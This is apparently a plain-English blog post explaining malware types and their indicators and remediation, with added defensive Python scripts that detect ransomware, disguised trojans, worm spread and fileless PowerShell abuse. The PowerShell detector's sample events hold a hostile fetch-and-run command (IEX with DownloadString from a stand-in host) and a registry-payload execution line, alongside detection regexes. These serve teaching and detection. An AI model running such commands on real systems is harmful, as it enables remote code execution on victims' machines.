Extremely Easy Security — Learn Cyber Attack Types in Plain English (1.2 Part 1)

easysecurity
7 min read · Jan 27, 2022

Today we will be covering different types of cyberattacks and the indicators you can look for to find them, as well as the remediation (how to fix and remove them). All of this will be on the exam.

If the last part of that first sentence sounded condescending (looking down on someone because you think they aren’t smart), because you already know what remediation means, it wasn’t meant to be. I just don’t like big words (the opposite of small words) so I feel the need to explain everything (telling someone something until they understand).

Sorry, I really do think you’re smart (not stupid). I just can’t stop doing it, because this is Extremely Easy Security (security that isn’t hard) and it’s become a compulsion (a thing you do over and over again obsessively). Help.

Malware

What is malware, and how is it different from a virus?

“Malware” just means malicious software. It’s any program that’s somehow not good.

A lot of people use the terms virus and malware interchangeably, but this isn’t correct. A virus is malware that copies itself into other files or programs and spreads that way from one computer to another. That’s it. That’s all it is.

So, given that definition, all viruses are malware. But not all malware is a virus.

Another thing to be clear about: this series treats a worm as a type of virus, because a worm is a malicious program that self-replicates. (Some textbooks list worms as their own category instead. The distinction that matters for the exam is that a worm spreads on its own, while most viruses need a person to open or run something.) But not all viruses are worms, because most viruses can’t replicate by themselves.

If any of that seems confusing, I’ll explain below.

(Note: Different types of malware have different indicators of compromise, or IoCs, which are the signs that tell you you’ve actually been hit, sort of like symptoms that lead to a diagnosis. Each one also has different remediation techniques.

General indicators of compromise can be found here.)

Ransomware

This is when attackers gain access to your computer or your internal network and encrypt the important files on it (and, in a company, on every server and file share they can reach). Usually they add a message that pops up and says you’ll never get your files back unless you pay for the decryption key. Demands range from a few hundred dollars for a home user to millions for a company.

Indicators of Compromise: This one is pretty obvious, because the attackers will usually tell you, in a ransom note, when they want your money.

Something like that.

Other than that, some symptoms exist. The inability to open certain files, file names suddenly changing across your computer (cat.jpg becoming cat.d464kjd3 or cat.jpg.locked, since most families tack on their own extension), new text files with names like README or HOW_TO_DECRYPT appearing in every folder, or your computer suddenly working really hard in the background with the disk constantly busy (this could be the malware encrypting your files).
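Here is what those symptoms look like when you turn them into a check you can actually run. The script below is an added example written for this article, not code from the original post or from any ransomware tool: it looks at a set of files and flags names where a strange extension has been tacked onto a familiar one, contents that look like random noise with no recognisable file header (encrypted data has no structure, while a real JPEG or ZIP is also high-entropy but still starts with its magic bytes), and small text files written like a ransom note. The extension list, keyword list and entropy threshold are assumptions chosen for the demo, and the sample files are constructed, not real.

```python
"""Ransomware indicator scan over a folder (added example, Python stdlib only).

Looks for the symptoms described above: renamed files (cat.jpg -> cat.jpg.d464kjd3),
file contents that are random-looking blobs with no recognisable file header, and
small text files written like a ransom note. Thresholds and name lists are assumptions
for the demo, not taken from the article.
"""
import math
import os
from collections import Counter

# A few common file signatures. Compressed formats like JPEG/PNG/ZIP are also
# high-entropy, so a known header is what tells them apart from encrypted data.
MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip/office",
    b"MZ": "exe",
}
KNOWN_EXT = {"jpg", "jpeg", "png", "pdf", "docx", "xlsx", "pptx", "txt", "zip", "exe", "mp4"}
ENTROPY_THRESHOLD = 7.5            # bits/byte (assumed); random or encrypted data sits near 8.0
NOTE_KEYWORDS = ("decrypt", "bitcoin", "ransom", "your files")


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty/constant data, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def detect_format(data: bytes):
    """Label of the first matching magic prefix, or None if the header is unrecognised."""
    for prefix, label in MAGIC.items():
        if data.startswith(prefix):
            return label
    return None


def suspicious_rename(name: str) -> bool:
    """True for names like photo.jpg.d464kjd3: a known extension followed by an unknown one."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-2] in KNOWN_EXT and parts[-1] not in KNOWN_EXT


def looks_like_ransom_note(name: str, data: bytes) -> bool:
    """Small UTF-8 text file whose name or body uses typical ransom-note vocabulary."""
    if len(data) > 20_000:
        return False
    try:
        text = data.decode("utf-8").lower()
    except UnicodeDecodeError:
        return False
    return any(k in name.lower() + " " + text for k in NOTE_KEYWORDS)


def scan_files(files):
    """files: {name: bytes}. Returns {name: [reasons]} for everything that looks wrong."""
    findings = {}
    for name, data in files.items():
        reasons = []
        if suspicious_rename(name):
            reasons.append("unknown extension appended to a known one")
        if detect_format(data) is None and shannon_entropy(data) > ENTROPY_THRESHOLD:
            reasons.append("high-entropy content with no recognisable header")
        if looks_like_ransom_note(name, data):
            reasons.append("ransom-note wording")
        if reasons:
            findings[name] = reasons
    return findings


def scan_directory(root: str):
    """Walk a real folder and feed the first 64 KiB of each file to scan_files()."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            try:
                with open(path, "rb") as fh:
                    files[os.path.relpath(path, root)] = fh.read(65536)
            except OSError:
                continue
    return scan_files(files)


# Constructed sample files for the demo (not real data). The two "encrypted" blobs are
# built from a permutation of all 256 byte values so their entropy is exactly 8 bits/byte.
SAMPLE_FILES = {
    "cat.jpg": b"\xff\xd8\xff\xe0" + bytes(range(256)) * 4,        # real header, high entropy: fine
    "report.pdf": b"%PDF-1.7\n" + b"quarterly numbers " * 100,      # ordinary low-entropy document
    "notes.txt": b"milk, eggs, bread",
    "cat.jpg.d464kjd3": bytes((i * 97 + 13) % 256 for i in range(4096)),
    "budget.xlsx.locked": bytes((i * 31 + 7) % 256 for i in range(4096)),
    "README_DECRYPT.txt": b"All your files have been encrypted. Send 2 bitcoin to get the key.",
}

if __name__ == "__main__":
    for name, reasons in scan_files(SAMPLE_FILES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

To try it on a real share, call scan_directory("/path/to/share"). Expect false positives on archive or media formats whose header isn’t in MAGIC (7z, proprietary backups and so on); add their signatures before trusting the entropy check, and treat a hit on the ransom-note check as the strongest of the three signals.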

Remediation: The best remediation for ransomware is to prevent it. It’s hard to reverse once you’ve become a victim, unless it’s a known ransomware with a flawed implementation, and even then it can be challenging. Ransomware is often tailored towards its target. The best way to prevent it is good security awareness, keeping systems patched, and frequent data backups. (Make sure at least one backup copy is offline or otherwise unreachable from your network, and test that you can actually restore from it. Ransomware routinely looks for mapped drives and backup shares and encrypts or deletes them first.)

If you’re dealing with ransomware at home, you should disconnect your computer from your network. If you have a backup, you can completely wipe the computer and restore from the backup. If you have no backups, identify the ransomware family (the ransom note and the new file extension usually give it away) and check whether a free decryption tool exists for it. Decryptors are available for some families whose keys were recovered or whose encryption was badly implemented (the No More Ransom project collects them), but for most current ransomware there is none.

If you’re in an organization, you should let the appropriate authority know you’ve been infected so they can contact an incident response team.

What you should not do in either case is immediately upload a sample of the ransomware to the internet. This may seem counterintuitive because of services like VirusTotal, which are very effective in helping you classify unknown malware. But anything you upload to VirusTotal is shared with its antivirus partners and searchable by paying subscribers, and ransomware samples (and especially the ransom note) can contain sensitive information about you or your company, such as hostnames, file paths or the victim ID the attackers use. If you want to know whether a file is already known, compute its SHA-256 hash and search for the hash instead; that reveals nothing about you.

Some companies pay off the bad guys. The U.S. government recommends you don’t do this, but people do it anyway. They figure that the information loss is more costly than actually paying up. The problem is that this reinforces criminals’ belief that they’ll succeed, there’s no guarantee the decryptor you get back actually works, and if the attackers also stole copies of your data (which is now common), paying doesn’t get those back.

Check out CISA’s Ransomware Guide for more information.

A hacker waits for Steve to pay ransom, but Steve only has Monopoly money.

Trojans

Trojan malware, like the myth, is a piece of software that looks innocent enough to let inside your network but does something evil once you run it. Unlike a virus or a worm, a trojan doesn’t spread by itself; it relies on you being tricked into installing or opening it. There are a billion different types of trojans, but this is the basic idea.

An example might be a torrenting program that’s secretly mining cryptocurrency with your electricity and hardware. Or it could be a file you received in an email that looks like a normal Word document, but when you open it and click “Enable Content”, its macro runs and suddenly someone has remote access to your computer (a remote access trojan, or RAT).
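One check worth building into the habit of “make sure what you download is legitimate” is to look at what a file actually is, not what its name says. The script below is an added example written for this article (not code from the original post or from any product): it sniffs the first bytes of a file, flags Windows executables hiding behind a document name or a double extension like statement.pdf.exe, and opens Office documents as the zip files they are to see whether a VBA macro project is inside. The sample attachments are constructed in memory, and the extension lists and messages are assumptions for the demo.

```python
"""Does this file's content match what its name claims? (added example, stdlib only)

Two checks that catch the trojans described above before anyone double-clicks:
  * the bytes say "Windows executable" (MZ header) while the name says .pdf / .docx,
    or the name hides a second extension (statement.pdf.exe);
  * an Office document is a zip that carries a VBA macro project (word/vbaProject.bin).
Legacy binary .doc/.xls files are flagged as "can't tell" because reading their macro
streams needs an OLE parser (oletools, for instance), which this demo doesn't include.
Extension lists and wording are assumptions made for the demo.
"""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"      # legacy .doc/.xls/.ppt container
EXEC_EXTS = {"exe", "scr", "com", "bat", "cmd", "js", "vbs", "ps1", "msi", "hta"}
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
MACRO_FREE = {"docx", "xlsx", "pptx"}              # Office refuses to run macros from these
LEGACY_OFFICE = {"doc", "xls", "ppt"}


def sniff(data: bytes) -> str:
    """Coarse container type from the first bytes, ignoring the file name entirely."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data.startswith(b"%PDF"):
        return "pdf"
    return "unknown"


def ooxml_macro_parts(data: bytes):
    """Names of VBA containers inside an OOXML zip (.docx/.docm/.xlsm...); [] if none or not a zip."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
    except zipfile.BadZipFile:
        return []


def triage(name: str, data: bytes):
    """Return a list of human-readable warnings for one file (empty list = nothing odd)."""
    warnings = []
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    kind = sniff(data)
    if len(parts) > 2 and parts[-2] in DOC_EXTS and ext in EXEC_EXTS:
        warnings.append(f"double extension: shown as .{parts[-2]} but really .{ext}")
    if kind == "pe" and ext not in EXEC_EXTS:
        warnings.append(f"Windows executable (MZ header) disguised as .{ext}")
    vba = ooxml_macro_parts(data) if kind == "zip" else []
    if vba and ext in MACRO_FREE:
        warnings.append(f"VBA project inside a macro-free .{ext} ({', '.join(vba)})")
    elif vba:
        warnings.append(f"macro-enabled document carries VBA: {', '.join(vba)}")
    if kind == "ole2" and ext in LEGACY_OFFICE:
        warnings.append("legacy binary Office file: macros possible, needs an OLE parser to check")
    return warnings


def triage_all(files):
    """files: {name: bytes}. Returns {name: warnings} only for files that raised a warning."""
    return {n: w for n, w in ((n, triage(n, d)) for n, d in files.items()) if w}


def make_ooxml(with_vba: bool) -> bytes:
    """Build a minimal OOXML-shaped zip in memory (constructed sample, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00fake vba project\x00")
    return buf.getvalue()


# Constructed inbox of attachments for the demo.
SAMPLE_FILES = {
    "minutes.docx": make_ooxml(False),                  # plain document: fine
    "readme.txt": b"just text",
    "invoice.docm": make_ooxml(True),                   # macro-enabled: review before opening
    "resume.docx": make_ooxml(True),                    # VBA where Word would not expect it
    "statement.pdf.exe": b"MZ\x90\x00" + b"\x00" * 60,  # classic double extension
    "report.pdf": b"MZ\x90\x00" + b"\x00" * 60,         # executable renamed to .pdf
    "old_memo.doc": OLE2_MAGIC + b"\x00" * 32,          # legacy format: can't tell without oletools
}

if __name__ == "__main__":
    for name, warnings in triage_all(SAMPLE_FILES).items():
        print(name)
        for w in warnings:
            print("   -", w)
```

The point of sniffing the bytes first is that Windows Explorer hides known extensions by default, so “statement.pdf.exe” shows up as “statement.pdf” with a PDF-looking icon if the attacker bothered to embed one. The content check doesn’t care what the icon or the name says.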

Remediation: Again, prevention is extremely important. Keep regular offline backups, know the signs and characteristics of social engineering, make sure that any programs you download are legitimate and have a good reputation, and don’t enable macros in documents from people you don’t know.

If you’re at home, disconnect your computer from your network and run a scan using an antimalware program. If you want to be sure, you can factory reset your computer and reinstall from a backup.

(If you can’t tell, I use factory resets a lot. But there are cases in which they won’t completely free you of malware. Sometimes backups become infected, or you’ve got a special type of malware that survives a factory reset, which will be covered later.)

Supposed to be a Trojan horse, but just looks like a sad, triangular shaped real horse with wheels for feet.

Worms

As mentioned earlier, a worm is a type of virus that replicates and spreads on its own. A virus, in general, replicates and spreads because of user interaction (for example, someone sends you an email with the virus, you open the attachment, and the virus mails copies of itself to your contacts).

A worm requires no user interaction to spread. Once it gets on a computer, it can find more computers connected to the first one by itself, copy itself over to those, and then replicate and keep repeating the process.

Indicators of Compromise: These vary with what the worm carries, but one sign that you’re dealing with a worm is that the infection seems to come out of nowhere and shows up on a lot of devices on your network in a short time, with each infected machine suddenly making connections to many others on the same service (file sharing, remote administration, and so on).
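The “spread to a lot of devices” symptom is something you can look for in firewall or flow logs. The script below is an added example for this article, not code from the original post: it finds hosts that contacted an unusually large number of other hosts on one service port within a minute (the fan-out of a worm scanning for victims) and then links those hosts into chains where a victim of one spreader later becomes a spreader itself. The log format, the addresses, port 445 and the thresholds are all constructed for the demo.

```python
"""Spotting worm-like spread in connection logs (added example, stdlib only).

A worm looks for neighbours and copies itself to them, so in the logs one host suddenly
talks to many others on the same service port, and a little later some of those targets
start doing the same thing. This script finds the "fan-out" hosts and then links them
into propagation chains. The log format, addresses, port and thresholds are all
constructed for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def parse_log(text):
    """Lines of '<iso timestamp> <src> <dst> <dport>' -> time-sorted list of (ts, src, dst, port)."""
    events = []
    for line in text.strip().splitlines():
        ts, src, dst, port = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return sorted(events)


def fanout_hosts(events, port, window=timedelta(seconds=60), min_targets=5):
    """Sources that reached >= min_targets distinct hosts on `port` inside any `window`.

    Returns {src: (start_of_busiest_window, distinct_targets_in_it)}.
    """
    by_src = defaultdict(list)
    for ts, src, dst, p in events:
        if p == port:
            by_src[src].append((ts, dst))
    flagged = {}
    for src, hits in by_src.items():
        best, start = 0, None
        for i, (t0, _) in enumerate(hits):            # slide the window over this host's hits
            targets = {d for t, d in hits[i:] if t - t0 <= window}
            if len(targets) > best:
                best, start = len(targets), t0
        if best >= min_targets:
            flagged[src] = (start, best)
    return flagged


def propagation_chains(events, port, **kw):
    """(spreader, victim) pairs: `victim` was hit by a fan-out host and later fanned out itself."""
    flagged = fanout_hosts(events, port, **kw)
    first_contact = defaultdict(dict)                 # src -> {dst: first time src hit dst}
    for ts, src, dst, p in events:
        if p == port and dst not in first_contact[src]:
            first_contact[src][dst] = ts
    chains = []
    for a in flagged:
        for b in flagged:
            if a != b and b in first_contact[a] and first_contact[a][b] <= flagged[b][0]:
                chains.append((a, b))
    return sorted(chains)


# Constructed log: patient zero (10.0.0.5) probes eight hosts on 445, one of its victims
# (10.0.0.12) starts probing eight more a minute later; the rest is normal-looking noise.
SAMPLE_LOG = "\n".join(
    [f"2022-01-27T10:00:{i + 1:02d} 10.0.0.5 10.0.0.{10 + i} 445" for i in range(8)]
    + [f"2022-01-27T10:01:{10 + i:02d} 10.0.0.12 10.0.0.{20 + i} 445" for i in range(8)]
    + [f"2022-01-27T10:00:{5 * i:02d} 10.0.0.99 10.0.0.1 443" for i in range(1, 6)]   # web: one target
    + [f"2022-01-27T10:02:{i:02d} 10.0.0.50 10.0.0.{30 + i} 445" for i in range(3)]   # three shares: under threshold
)

if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for src, (start, n) in fanout_hosts(events, 445).items():
        print(f"{src} reached {n} hosts on 445 within a minute starting {start:%H:%M:%S}")
    for a, b in propagation_chains(events, 445):
        print(f"{a} -> {b}: victim became a spreader")
```

Before using a check like this on real logs, allow-list the hosts that legitimately talk to everything on that port (vulnerability scanners, backup and management servers), or they will top the list every day.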

Remediation: This depends on what the worm carries. Remediating a ransomware worm looks different from remediating an email worm. In every case, though, the first two steps are the same: cut the infected machines or network segments off so it stops spreading, and close the hole it used (usually an unpatched service or a reused password) before you put anything back.

PUPs

PUP means “Potentially Unwanted Program.” These aren’t nearly as malicious as say, something like NotPetya. They’re mostly just annoying, but they can also be damaging to your privacy and security, like selling your data or opening you up to other problems.

Have you ever tried downloading an application only to get to the installation window and find out that the installer wants to add seven extra programs alongside it?

Sometimes they even remove the option for you to uncheck them, or don’t tell you that this is what’s attached to the program you wanted. You just download it, and then the seven extra programs appear out of nowhere.

IoCs: Strange programs suddenly appear on your desktop or in your program manager. Or your search engine or browser homepage suddenly changes to a completely different one. If you have these symptoms but a malware scan comes back clean, that’s also a hint you’re dealing with a PUP, because scanners often don’t flag them as malicious.

Remediation: I hate PUPs because antimalware programs often won’t flag them. Then they won’t remediate them, because they don’t appear malicious enough. This forces you to go through and manually delete the unwanted software, which is a security crapshoot at best. When this happens, I usually just take a backup of my files and wipe my PC anyway.

Good, respectable software companies know PUPs are annoying and don’t need to make money using them. Stick to respectable companies.

Fileless Malware

This malware is harder to track down because it doesn’t drop a traditional program file on the hard drive, so it leaves very little for a file scanner to find. Fileless malware runs in memory (RAM), usually by abusing tools that are already on the machine, like PowerShell or WMI, and feeding them a script from somewhere other than a file (a command line, a registry value, a web page). Memory is volatile, meaning temporary: it’s only there until the computer is turned off, unlike hard disk storage. Antimalware that only scans files on disk won’t catch it, which is what makes it appealing to attackers. (One caveat: a lot of “fileless” malware still parks a small launcher in the registry, a scheduled task or WMI so it comes back after a reboot, so “turn it off and it’s gone” isn’t a guarantee.)

Matthew has searched all the files but can’t find anything suspicious.

IoCs: You’ve detected malicious traffic coming from your computer and going out over the network, but you can’t find any evidence on the computer’s hard drive that there’s anything wrong.
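Fileless doesn’t mean traceless: the command line that launched PowerShell is usually logged (process-creation events from Sysmon or an EDR), and that is where the evidence lives. The script below is an added example for this article, not code from the original post or from any vendor: it reads a few constructed process-creation events, decodes the base64 -EncodedCommand blob that attackers use to hide what the script does, and scores the expanded command for the usual tells, such as being launched by an Office app, a hidden window, and code downloaded or read from the registry and run with Invoke-Expression. The event shape, rules and weights are assumptions made for the demo; example.invalid is a reserved, non-resolving domain name.

```python
"""Triage of PowerShell process-creation events for fileless tricks (added example, stdlib only).

Fileless attacks usually still leave one artefact: a command line. This script reads
process-creation events (JSON lines shaped roughly like a Sysmon/EDR export), decodes
any -EncodedCommand blob (base64 of UTF-16LE text), and scores the expanded command for
the habits the text describes: Office apps spawning PowerShell, hidden windows, code
pulled from the network or the registry and run with Invoke-Expression. The event shape,
rules and weights are assumptions for the demo, not a vendor's detection logic.
"""
import base64
import json
import re

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RULES = [  # (regex, weight, reason); weights are assumed for the demo
    (r"invoke-expression|\biex\b", 2, "Invoke-Expression runs text as code"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", 2, "fetches code over the network"),
    (r"-w(?:indowstyle)?\s+hidden", 1, "hidden window"),
    (r"-nop(?:rofile)?\b", 1, "profile skipped"),
    (r"-e(?:p|xecutionpolicy)?\s+bypass", 1, "execution policy bypass"),
    (r"frombase64string", 1, "inline base64 payload"),
    (r"get-itemproperty\s+hk(?:cu|lm)", 1, "reads a payload out of the registry"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), w, r) for p, w, r in RULES]


def expand_command(cmdline: str):
    """Replace an -EncodedCommand blob with its decoded text. Returns (expanded, decoded_or_None)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, None
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return cmdline, None
    return cmdline[: m.start(1)] + decoded + cmdline[m.end(1):], decoded


def score_event(event: dict, threshold: int = 4) -> dict:
    """Score one process-creation event; 'suspicious' is True at or above the threshold."""
    text, decoded = expand_command(event.get("CommandLine", ""))
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    score, reasons = 0, []
    if parent in OFFICE_PARENTS:
        score, reasons = score + 3, reasons + [f"spawned by {parent}"]
    if decoded is not None:
        score, reasons = score + 2, reasons + ["encoded command line"]
    for rx, weight, reason in COMPILED:
        if rx.search(text):
            score += weight
            reasons.append(reason)
    return {"image": event.get("Image", ""), "score": score, "reasons": reasons,
            "decoded": decoded, "suspicious": score >= threshold}


def analyze(lines, threshold: int = 4):
    """JSON lines in, one scored dict per event out (same order)."""
    return [score_event(json.loads(line), threshold) for line in lines]


def encode_ps(text: str) -> str:
    """What `powershell -EncodedCommand` expects: base64 over UTF-16LE (used to build samples)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed events (not real telemetry). example.invalid is a reserved, non-resolving name.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -Command "Get-Process | Sort-Object CPU -Descending"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -c '
                    '"Invoke-Expression (Get-ItemProperty HKCU:\\Software\\Demo).Payload"'},
]]

if __name__ == "__main__":
    for r in analyze(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{flag}] score={r['score']} {'; '.join(r['reasons'])}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The fourth sample is the registry trick from the caveat above: nothing is written to disk as a script, the payload sits in a registry value and gets read and executed at launch. That is exactly the kind of thing a file scanner never sees and a command-line check catches in seconds.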

Remediation: Your average user has a hard time remediating this type of malware. If you think it’s happening to you, it’s probably best to contact an expert. Turning the computer off at least halts it temporarily, but you lose your evidence that way, because the memory is wiped. While the computer is still on, incident responders isolate it from the network, capture an image of the memory with an acquisition tool (WinPmem or DumpIt on Windows, LiME on Linux, or the EDR’s own capture feature) and then analyze that image with a framework like Volatility to find the injected code. They also check the registry, scheduled tasks and WMI for anything that would relaunch it after a reboot.

(For more information see this great article from Cybereason.)

Up Next: Oh No! “Learn Cyber Attack Types in Plain English (1.2 Part 2)” isn’t out yet, but it will be soon. You can subscribe.


easysecurity

Writer, ethical hacker, humorist. Extremely Easy Security.